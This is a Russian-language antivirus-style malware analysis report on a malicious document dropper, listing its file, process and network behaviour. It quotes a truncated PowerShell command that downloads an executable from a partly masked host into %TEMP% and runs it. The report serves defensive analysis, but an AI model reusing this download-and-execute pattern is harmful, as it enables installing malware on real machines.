Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- $bkruk как %temp%\yrffgox0.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function zpmpfy5([String] $bkruk){(New-Object System.Net.WebClient).DownloadFile($bkruk,''%TEMP%\Yrffgox0.exe'');Start-Process ''%TEMP%\Yrffgox0.exe'';}try{zpmpfy5(...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1924
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\application data\microsoft\forms\winword.box
- %TEMP%\ycwy.bat
- %TEMP%\1367036.cvr
Сетевая активность
Подключается к
- 'ba###teks.com':80
TCP
Запросы HTTP GET
- http://ba###teks.com/lopinost.bin
UDP
- DNS ASK ba###teks.com
- DNS ASK rs###tria.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function zpmpfy5([String] $bkruk){(New-Object System.Net.WebClient).DownloadFile($bkruk,''%TEMP%\Yrffgox0.exe'');Start-Process ''%TEMP%\Yrffgox0.exe'';}try{zpmpfy5(...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Ycwy.bat" "' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Ycwy.bat" "
